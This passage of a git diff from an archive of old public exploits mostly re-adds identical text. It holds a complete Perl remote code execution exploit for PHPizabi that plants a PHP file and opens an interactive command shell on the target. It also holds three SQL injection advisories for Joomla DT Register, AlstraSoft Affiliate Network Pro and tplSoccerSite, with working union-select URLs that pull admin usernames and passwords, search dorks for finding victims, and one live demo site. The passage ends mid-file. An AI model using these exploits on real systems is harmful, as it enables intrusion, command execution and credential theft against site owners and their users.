-	$get_dA = get_d_p_s("get");
-	$post_dA = get_d_p_s("post");
-
-	my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
-        $jj = 1;
-	$ii = 48;
-        $hh = 1;
-	$ppp = 0;
-	$s = shift;
-	$a = "";
-	$res_p = "";
-	$h = "";
-	$ua= "";
-	$agent= "";
-	$k= "";
-	$v= "";
-	$get_data= "";
-	$post_data= "";
-	$header_dA = "";
-	$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};
-	$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};
-	$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};
-	$method_m = $a_->{'sending_options'}{'method_a'};
-	$ua = LWP::UserAgent->new;
-	$ua->timeout($a_->{'options'}{'timeout'});  
-	if ($a_->{'options'}{'proxy'}) {
-	    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
-	}
-	$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; 
-	$ua->agent($agent); 
-	{                                                 
-		while (($k,$v) = each(%{$a_}))
-			{
-			if ($k ne "options" && $k ne "sending_options")
-				{
-				foreach $r (@{$a_->{$k}})
-					{
-						print $a_->{$k}[0];
-					}
-				}
-			}
-
-
-		foreach $j (@{$a_->{'options'}{'default_headers'}})
-			{    
-			$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
-			$m++;
-			}
-
-		if ($a_->{'options'}{'cookie'}{'cookie'}[0])
-			{          
-			$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
-			}
-
-			
-
-	}
-	switch ($method_m)        
-	{
-		case "attack" { &attack();}
-		case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
-		case "REMOTE_COMMAND_EXECUTION" { &attack();}
-		case "REMOTE_CODE_EXECUTION" {&attack();}
-		case "REMOTE_FILE_INCLUSION" { &attack();}
-		case "LOCAL_FILE_INCLUSION" { &attack(); }
-		else { &attack(); }  
-
-	}
-
-
-	sub attack
-	{
-		my ($jj);
-		my ($h);
-		my($x);
-		if ($post_dA eq "") {
-			$method = "get";
-		} elsif ($post_dA ne "")
-		{
-			$method = "post";
-		}
-		if ($method eq "get") {  
-			$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
-			${$a_}{$id}{'content'} = $res_p;
-			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
-				{
-				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
-				
-				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
-					{
-					if (${$jj} ne "")
-						{
-						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
-						$x++;
-						}
-						$jj++;
-					}
-					
-					$h++;
-				}
-		} elsif ($method eq "post")
-		{
-			$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
-		
-			${$a_}{$id}{'content'} = $res_p;
-
-			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
-				{
-				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
-				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
-					{
-					if (${$jj} ne "")
-						{
-						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
-						$x++;
-						}
-						$jj++;
-					}
-					$h++;
-				}
-		}
-
-	}
-	sub sql_injection_blind
-	{
-		while ()
-			{
-			while ($ii <= 120)
-				{
-				
-				$itsx = "[".chr($ii)."]";
-				$l = length($itsx);
-				$b = ("\b")x$l;
-				syswrite STDOUT,$b.$itsx;
-
-				if(check($ii,$hh) == 1)
-				{
-					syswrite STDOUT,$b.chr($ii)."---";
-					$hh++;
-					$chr = $chr.chr($ii);
-					}
-					$ii++;
-			}
-			push(@ffs,length($chr)); 
-			if (($#ffs - 999) == $ffs)
-				{
-				exit;
-				}
-				$ii = 48;
-		}
-	}
-	sub check($$)
-	{
-		my ($h);
-		my ($a);
-		$ii = shift;
-		$hh = shift;
-
-		if (get_d_p_s("post") ne "")
-			{
-			$method = "post";
-		} else { $method = "get";}
-		if ($method eq "get")
-			{
-			$ppp++;
-			$query = modify($get_dA,$ii,$hh);
-			$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
-
-			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
-				{
-				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
-					{
-					if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
-						return 1;
-					} else { return 0;}
-					}
-					else 
-				{
-						if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
-							return 0;
-						}else { return 1;}
-	
-						
-				}
-				$h++;
-			}
-		} elsif ($method eq "post")
-			{
-			$ppp++;
-			$query_g = modify($get_dA,$ii,$hh);
-			$query_p = modify($post_dA,$ii,$hh);
-			
-			$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
-			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
-				{
-				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
-					{
-					return 1;
-					}
-					else 
-					{
-						return 0;
-					}
-				$h++;
-			}
-		}
-	}
-    sub modify($$$)
-	{
-	    $string = shift;
-	    $replace_by = shift;
-	    $replace_by1 = shift;
-
-	    if ($string !~/\$i/ && $string !~/\$h/) {
-		    return $string;
-	        } elsif ($string !~/\$i/)
-		{
-		        $ff = substr($string,0,index($string,"\$h"));
-	            $ee =  substr($string,rindex($string,"\$h")+2);
-	            $string = $ff.$replace_by1.$ee;
-
-	            return $string;
-		} elsif ($string !~/\$h/)
-		{
-	        $f = substr($string,0,index($string,"\$i"));
-	        $e = substr($string,rindex($string,"\$i")+2);
-	        $string = $f.$replace_by.$e;
-		    return $string;
-		} else
-		{
-		    $f = substr($string,0,index($string,"\$i"));
-	        $e = substr($string,rindex($string,"\$i")+2);
-	        $string = $f.$replace_by.$e;
-
-		    $ff = substr($string,0,index($string,"\$h"));
-	        $ee =  substr($string,rindex($string,"\$h")+2);
-	        $string = $ff.$replace_by1.$ee;
-
-		    return $string;
-		}
-	}
-	sub get_d_p_s
-	{
-		$k = 0;
-		$v = 0;
-		$g_d_p_s = shift;
-
-		@post = ();
-		@get = ();
-		
-		$post_data = "";
-		$get_data = "";
-		$header_data = "";
-		%header_dA = ();
-		$p = "";
-		$g = "";
-		while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
-			{
-			if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)
-				{
-				$p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
-				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {
-					$g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
-				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
-				{
-				        $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
-				}
-			}
-		if ($g_d_p_s eq "get")
-			{
-			return $g;
-			}
-			elsif ($g_d_p_s eq "post")
-		{
-			return $p;
-		} elsif ($g_d_p_s eq "header")
-		{
-			return %header_dA;
-		}
-
-			@a_ = ();
-	}
-	sub get_data
-	{
-		$h_host_h_xdsjaop = shift;
-		$h_path_h_xdsjaop = shift;
-		%hash = get_d_p_s("header");
-	    while (($u,$c) = each(%hash))
-			{
-			$ua->default_headers->push_header($u => $c);
-			}
-		$req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
-		return $req->content;
-	}
-	sub post_data
-	{
-		$h_host_h_xdsjaop = shift;
-		$h_path_h_xdsjaop = shift;
-		$content_type = shift;
-		$send = shift;
-		%hash = get_d_p_s("header");
-	    while (($u,$c) = each(%hash))
-			{
-		    $ua->default_headers->push_header($u => $c);
-			}
-		$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
-		$req->content_type($content_type);
-		$req->content($send);
-		$res = $ua->request($req);
-		return $res->content;
-	}
-
-}
-
-# milw0rm.com [2008-07-16]
+#!/usr/bin/perl 
+#inphex
+#PHPizabi v0.848b C1 HFP1 Remote Code Execution
+#http://www.dz-secure.com/tools/1/WebESploit.pl.txt
+#if you are seeking for a partner to work on some project(s) just send an email inphex0 [ at ] gmail [ dot ] com
+#system/v_cron_proc.php
+#	if (!function_exists("writeLogEntry")) {
+#		function writeLogEntry($data) {
+#			global $CONF;
+#			
+#			touch($CONF["CRON_LOGFILE"]);
+#		
+#			if ($handle = fopen($CONF["CRON_LOGFILE"], "a")) {
+#				fwrite($handle, "[".date($CONF["LOCALE_LONG_DATE_TIME"])."] $data \n");
+#				fclose($handle);
+#			}
+#		}
+#	}
+#
+#
+#writeLogEntry("Cron cycle started");
+#writeLogEntry("Cron cycle ended");
+########################################################
+#overwritable:
+#1.$CONF["CRON_LOGFILE"]
+#2.$CONF["LOCALE_LONG_DATE_TIME"]
+#
+#date($CONF["LOCALE_LONG_DATE_TIME"]) ;\
+#solution:
+#
+#returns: pm
+#
+#returns: a
+#seems logically eh?
+#
+#usage: perl ye.pl host /path/
+#
+## [C:\]# perl ye.pl host /path/
+## $[host]# id
+## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)
+#
+use LWP::UserAgent;
+use HTTP::Cookies;
+use Switch;
+
+$hy = shift;
+$host_ = "http://".$hy;
+$path_ = shift;
+$port = 80; #default
+$info{'info'} = { 
+	"description" => [""],
+	"options" =>
+	{
+		"agent" => "",  
+		"proxy" => "",  
+		"default_headers" => [  
+			["key","value"]], 
+		"timeout" => 0, 
+		"cookie" =>     
+		{
+			"cookie" => [""],
+		},
+	},
+	"sending_options" =>
+	{
+			"host" => $host_, 
+			"path" => $path_."system/v_cron_proc.php",
+		        "port" => $port,                  
+			"method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION",  
+			"attack" =>
+		{
+				"CONF[CRON_LOGFILE]" => ["get","CONF[CRON_LOGFILE]","yeee.php"],
+				"CONF[LOCALE_LONG_DATE_TIME]" => ["get","CONF[LOCALE_LONG_DATE_TIME]",""], #nice eh?:)
+		},
+	},
+
+};
+
+&start($info{'info'},222);
+while () {
+	print "\$[".$hy."]#";
+	$cmd = ;chomp($cmd);
+	$info{'info'} = { 
+		"description" => [""],
+		"options" =>
+			{
+			"agent" => "",  
+			"proxy" => "",  
+			"default_headers" => [  
+				["key","value"]], 
+			"timeout" => 0, 
+			"cookie" =>     
+			{
+				"cookie" => [""],
+			},
+		},
+		"sending_options" =>
+		{
+				"host" => $host_, 
+				"path" => $path_."system/yeee.php",
+			    "port" => $port,                  
+				"method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION",  
+				"attack" =>
+			{
+					"CONF[CRON_LOGFILE]" => ["get","cmd",$cmd],
+			},
+		},
+
+	};
+
+&start($info{'info'},221); 
+print ${$info{'info'}}{221}{'content'}."\n";
+}
+sub start
+{
+	
+	$a_ = shift;
+	$id = shift;
+	$post_dA = "";
+	$get_dA = get_d_p_s("get");
+	$post_dA = get_d_p_s("post");
+
+	my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
+        $jj = 1;
+	$ii = 48;
+        $hh = 1;
+	$ppp = 0;
+	$s = shift;
+	$a = "";
+	$res_p = "";
+	$h = "";
+	$ua= "";
+	$agent= "";
+	$k= "";
+	$v= "";
+	$get_data= "";
+	$post_data= "";
+	$header_dA = "";
+	$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};
+	$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};
+	$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};
+	$method_m = $a_->{'sending_options'}{'method_a'};
+	$ua = LWP::UserAgent->new;
+	$ua->timeout($a_->{'options'}{'timeout'});  
+	if ($a_->{'options'}{'proxy'}) {
+	    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
+	}
+	$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; 
+	$ua->agent($agent); 
+	{                                                 
+		while (($k,$v) = each(%{$a_}))
+			{
+			if ($k ne "options" && $k ne "sending_options")
+				{
+				foreach $r (@{$a_->{$k}})
+					{
+						print $a_->{$k}[0];
+					}
+				}
+			}
+
+
+		foreach $j (@{$a_->{'options'}{'default_headers'}})
+			{    
+			$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
+			$m++;
+			}
+
+		if ($a_->{'options'}{'cookie'}{'cookie'}[0])
+			{          
+			$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
+			}
+
+			
+
+	}
+	switch ($method_m)        
+	{
+		case "attack" { &attack();}
+		case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
+		case "REMOTE_COMMAND_EXECUTION" { &attack();}
+		case "REMOTE_CODE_EXECUTION" {&attack();}
+		case "REMOTE_FILE_INCLUSION" { &attack();}
+		case "LOCAL_FILE_INCLUSION" { &attack(); }
+		else { &attack(); }  
+
+	}
+
+
+	sub attack
+	{
+		my ($jj);
+		my ($h);
+		my($x);
+		if ($post_dA eq "") {
+			$method = "get";
+		} elsif ($post_dA ne "")
+		{
+			$method = "post";
+		}
+		if ($method eq "get") {  
+			$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
+			${$a_}{$id}{'content'} = $res_p;
+			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
+				{
+				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
+				
+				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
+					{
+					if (${$jj} ne "")
+						{
+						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
+						$x++;
+						}
+						$jj++;
+					}
+					
+					$h++;
+				}
+		} elsif ($method eq "post")
+		{
+			$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
+		
+			${$a_}{$id}{'content'} = $res_p;
+
+			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
+				{
+				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
+				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
+					{
+					if (${$jj} ne "")
+						{
+						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
+						$x++;
+						}
+						$jj++;
+					}
+					$h++;
+				}
+		}
+
+	}
+	sub sql_injection_blind
+	{
+		while ()
+			{
+			while ($ii <= 120)
+				{
+				
+				$itsx = "[".chr($ii)."]";
+				$l = length($itsx);
+				$b = ("\b")x$l;
+				syswrite STDOUT,$b.$itsx;
+
+				if(check($ii,$hh) == 1)
+				{
+					syswrite STDOUT,$b.chr($ii)."---";
+					$hh++;
+					$chr = $chr.chr($ii);
+					}
+					$ii++;
+			}
+			push(@ffs,length($chr)); 
+			if (($#ffs - 999) == $ffs)
+				{
+				exit;
+				}
+				$ii = 48;
+		}
+	}
+	sub check($$)
+	{
+		my ($h);
+		my ($a);
+		$ii = shift;
+		$hh = shift;
+
+		if (get_d_p_s("post") ne "")
+			{
+			$method = "post";
+		} else { $method = "get";}
+		if ($method eq "get")
+			{
+			$ppp++;
+			$query = modify($get_dA,$ii,$hh);
+			$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
+
+			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
+				{
+				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
+					{
+					if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
+						return 1;
+					} else { return 0;}
+					}
+					else 
+				{
+						if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
+							return 0;
+						}else { return 1;}
+	
+						
+				}
+				$h++;
+			}
+		} elsif ($method eq "post")
+			{
+			$ppp++;
+			$query_g = modify($get_dA,$ii,$hh);
+			$query_p = modify($post_dA,$ii,$hh);
+			
+			$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
+			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
+				{
+				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
+					{
+					return 1;
+					}
+					else 
+					{
+						return 0;
+					}
+				$h++;
+			}
+		}
+	}
+    sub modify($$$)
+	{
+	    $string = shift;
+	    $replace_by = shift;
+	    $replace_by1 = shift;
+
+	    if ($string !~/\$i/ && $string !~/\$h/) {
+		    return $string;
+	        } elsif ($string !~/\$i/)
+		{
+		        $ff = substr($string,0,index($string,"\$h"));
+	            $ee =  substr($string,rindex($string,"\$h")+2);
+	            $string = $ff.$replace_by1.$ee;
+
+	            return $string;
+		} elsif ($string !~/\$h/)
+		{
+	        $f = substr($string,0,index($string,"\$i"));
+	        $e = substr($string,rindex($string,"\$i")+2);
+	        $string = $f.$replace_by.$e;
+		    return $string;
+		} else
+		{
+		    $f = substr($string,0,index($string,"\$i"));
+	        $e = substr($string,rindex($string,"\$i")+2);
+	        $string = $f.$replace_by.$e;
+
+		    $ff = substr($string,0,index($string,"\$h"));
+	        $ee =  substr($string,rindex($string,"\$h")+2);
+	        $string = $ff.$replace_by1.$ee;
+
+		    return $string;
+		}
+	}
+	sub get_d_p_s
+	{
+		$k = 0;
+		$v = 0;
+		$g_d_p_s = shift;
+
+		@post = ();
+		@get = ();
+		
+		$post_data = "";
+		$get_data = "";
+		$header_data = "";
+		%header_dA = ();
+		$p = "";
+		$g = "";
+		while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
+			{
+			if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)
+				{
+				$p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
+				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {
+					$g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
+				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
+				{
+				        $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
+				}
+			}
+		if ($g_d_p_s eq "get")
+			{
+			return $g;
+			}
+			elsif ($g_d_p_s eq "post")
+		{
+			return $p;
+		} elsif ($g_d_p_s eq "header")
+		{
+			return %header_dA;
+		}
+
+			@a_ = ();
+	}
+	sub get_data
+	{
+		$h_host_h_xdsjaop = shift;
+		$h_path_h_xdsjaop = shift;
+		%hash = get_d_p_s("header");
+	    while (($u,$c) = each(%hash))
+			{
+			$ua->default_headers->push_header($u => $c);
+			}
+		$req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
+		return $req->content;
+	}
+	sub post_data
+	{
+		$h_host_h_xdsjaop = shift;
+		$h_path_h_xdsjaop = shift;
+		$content_type = shift;
+		$send = shift;
+		%hash = get_d_p_s("header");
+	    while (($u,$c) = each(%hash))
+			{
+		    $ua->default_headers->push_header($u => $c);
+			}
+		$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
+		$req->content_type($content_type);
+		$req->content($send);
+		$res = $ua->request($req);
+		return $res->content;
+	}
+
+}
+
+# milw0rm.com [2008-07-16]
diff --git a/platforms/php/webapps/6086.txt b/platforms/php/webapps/6086.txt
index 537eac94d..e5f3769e6 100755
--- a/platforms/php/webapps/6086.txt
+++ b/platforms/php/webapps/6086.txt
@@ -1,23 +1,23 @@
-/---------------------------------------------------------------\
-\                                				/
-/       Joomla Component DT Register Remote SQL injection       \
-\                                				/
-\---------------------------------------------------------------/
-
-
-[*] Author    :  His0k4 [ALGERIAN HaCkeR]
-
-[*] Dork      :  inurl:com_DTRegister eventId
-
-[*] Vendor    :  http://www.dthdevelopment.com/components/dt-register.html
-
-[*] POC        : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
-
-[*] Example    : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
-
-[*] Greetings  : All friends & muslims HaCkeRs
-                 www.dz-secure.com
-          
-----------------------------------------------------------------------------
-
-# milw0rm.com [2008-07-16]
+/---------------------------------------------------------------\
+\                                				/
+/       Joomla Component DT Register Remote SQL injection       \
+\                                				/
+\---------------------------------------------------------------/
+
+
+[*] Author    :  His0k4 [ALGERIAN HaCkeR]
+
+[*] Dork      :  inurl:com_DTRegister eventId
+
+[*] Vendor    :  http://www.dthdevelopment.com/components/dt-register.html
+
+[*] POC        : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
+
+[*] Example    : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
+
+[*] Greetings  : All friends & muslims HaCkeRs
+                 www.dz-secure.com
+          
+----------------------------------------------------------------------------
+
+# milw0rm.com [2008-07-16]
diff --git a/platforms/php/webapps/6087.txt b/platforms/php/webapps/6087.txt
index d682bd916..8ea55565e 100755
--- a/platforms/php/webapps/6087.txt
+++ b/platforms/php/webapps/6087.txt
@@ -1,54 +1,54 @@
-|___________________________________________________|
-|
-|AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-|
-| script : http://www.alstrasoft.com/affiliate.htm
-|
-| DorK   : "Affiliate Network Pro"
-| DorK   : inurl:"index.php?Act=directory"
-|
-|___________________________________________________|
-
-Exploit: 
-
-
-www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+from+partners_admin--
-
-Exploit 2 :
-
-www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin--
-
-_____________
-column_name
-
-login
-passwd
-_____________
-
-
-
-____________________________( Greetz )____________________________
-|
-| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
-|  
-|              Iraqihack | FAHD | mos_chori | Silic0n
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-07-16]
+|___________________________________________________|
+|
+|AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+|
+| script : http://www.alstrasoft.com/affiliate.htm
+|
+| DorK   : "Affiliate Network Pro"
+| DorK   : inurl:"index.php?Act=directory"
+|
+|___________________________________________________|
+
+Exploit: 
+
+
+www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+from+partners_admin--
+
+Exploit 2 :
+
+www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin--
+
+_____________
+column_name
+
+login
+passwd
+_____________
+
+
+
+____________________________( Greetz )____________________________
+|
+| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
+|  
+|              Iraqihack | FAHD | mos_chori | Silic0n
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-07-16]
diff --git a/platforms/php/webapps/6088.txt b/platforms/php/webapps/6088.txt
index 255bfb3af..75a0d2ab8 100755
--- a/platforms/php/webapps/6088.txt
+++ b/platforms/php/webapps/6088.txt
@@ -1,42 +1,42 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## tplSoccerSite 1.0 ( player.php id )
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRiAN Arab HACkErS
-########################
-########################
-##
-## -[[: L!VE DEMO :]]-
-##
-## 1) www.tpl-design.com/tplsoccersite/tampereunited/index.php?id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword)MrSQL,current_user,0,0+FROM+tplss_passwords/*
-## 2) www.tpl-design.com/tplsoccersite/tampereunited/player.php?id=-1'+UNION+SELECT+0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0,0,0,0,0,0+FROM+tplss_passwords/*
-## 3) www.tpl-design.com/tplsoccersite/tampereunited/opponent.php?opp=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0+FROM+tplss_passwords/*
-## 4) www.tpl-design.com/tplsoccersite/tampereunited/matchdetails.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),0,0,0,0,0+FROM+tplss_passwords/*
-## 5) www.tpl-design.com/tplsoccersite/tampereunited/additionalpage.php?id=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0+FROM+tplss_passwords/*
-##
-########################
-########################
- -[[ NOTE ]]-
-1 ) Download [[ tplSoccerSite 1.0 ]]   http://www.tpl-design.com/download/tpl_ss_10_free.zip
- 
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-16]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## tplSoccerSite 1.0 ( player.php id )
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRiAN Arab HACkErS
+########################
+########################
+##
+## -[[: L!VE DEMO :]]-
+##
+## 1) www.tpl-design.com/tplsoccersite/tampereunited/index.php?id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword)MrSQL,current_user,0,0+FROM+tplss_passwords/*
+## 2) www.tpl-design.com/tplsoccersite/tampereunited/player.php?id=-1'+UNION+SELECT+0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0,0,0,0,0,0+FROM+tplss_passwords/*
+## 3) www.tpl-design.com/tplsoccersite/tampereunited/opponent.php?opp=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0+FROM+tplss_passwords/*
+## 4) www.tpl-design.com/tplsoccersite/tampereunited/matchdetails.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),0,0,0,0,0+FROM+tplss_passwords/*
+## 5) www.tpl-design.com/tplsoccersite/tampereunited/additionalpage.php?id=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0+FROM+tplss_passwords/*
+##
+########################
+########################
+ -[[ NOTE ]]-
+1 ) Download [[ tplSoccerSite 1.0 ]]   http://www.tpl-design.com/download/tpl_ss_10_free.zip
+ 
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
